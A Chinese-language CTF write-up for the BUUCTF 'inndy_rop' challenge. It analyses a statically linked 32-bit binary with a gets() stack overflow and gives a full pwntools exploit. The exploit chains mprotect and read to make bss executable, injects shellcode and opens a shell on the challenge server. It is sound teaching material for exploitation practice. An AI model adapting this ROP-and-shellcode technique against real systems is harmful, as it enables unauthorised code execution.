inndy rop
# inndy rop
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/inndy_rop/rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
# 静态分析
overflow函数如下:
/* Decompiled vulnerable function: reads a line into a 1-byte stack local.
 * gets() imposes no length limit, and v1 sits at ebp-0xC, so any input longer
 * than 0xC bytes overwrites the saved ebp and then the return address.
 * No stack canary is present (see checksec output above), so nothing detects it. */
int overflow()
{
char v1; // [esp+Ch] [ebp-Ch]
return gets(&v1); // unbounded read: the root cause of the overflow
}
# 链接方式
file rop
rop: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=e9ed96cd1a8ea3af86b7b73048c909236d570d9e, not stripped
静态链接文件
# 思路分析
目前信息:
- overflow 函数存在任意长度的溢出点
- No canary found
- NX enabled
- No PIE
思路:
- 溢出劫持执行流到 mprotect, 修改 bss 段的权限, 将 shellcode 写入 bss 段处, 返回并执行获得 shell
- 溢出劫持执行流到
# exp
from pwn import *
# Terminal pwntools uses when it needs to open a split (e.g. for a debugger).
context.terminal = ['tmux', 'splitw', '-h']
# 32-bit x86 target, matching the checksec output above; debug logging shows every send/recv.
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/inndy_rop/rop'
# Remote challenge endpoint; the commented-out line below runs the binary locally instead.
io = remote('node4.buuoj.cn', 28710)
# io = process(pwnfile)
elf = ELF(pwnfile)
# v1 lives at ebp-0xC: 0xC bytes reach the saved ebp, 4 more reach the return address.
padding = 0xc+4
# The binary is statically linked, so libc functions resolve directly from its own symbol table.
mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']
bss_start = elf.bss() & 0xfffff000 # page-aligned: mprotect() requires a page-aligned start address
bss_size = 0x1000
rwx = 7  # PROT_READ | PROT_WRITE | PROT_EXEC
# pop;pop;pop;ret gadget. Binary-specific constant (No PIE, so it is a fixed address);
# it must be re-derived for any other build of the binary.
pop_3times_ret = 0x0806ecd8
# Chain: return into mprotect(bss_start, bss_size, rwx); the pop-3 gadget discards those three
# arguments, then read(0, bss_start, bss_size) fills the now-executable page, and read()'s own
# return address is bss_start, so execution continues in whatever was just read in.
# NOTE(review): this NX bypass depends on the process being allowed to turn a writable page
# executable; W^X enforcement at the kernel/LSM level would deny the mprotect step.
payload = flat(['a'*padding, mprotect_addr, pop_3times_ret, bss_start,bss_size, rwx, read_addr, bss_start, 0, bss_start, bss_size])
io.sendline(payload)
# Second stage, delivered through the read() call set up by the chain above.
shellcode = asm(shellcraft.sh())
io.send(shellcode)
io.interactive()
上次更新: 2022/08/15, 00:29:49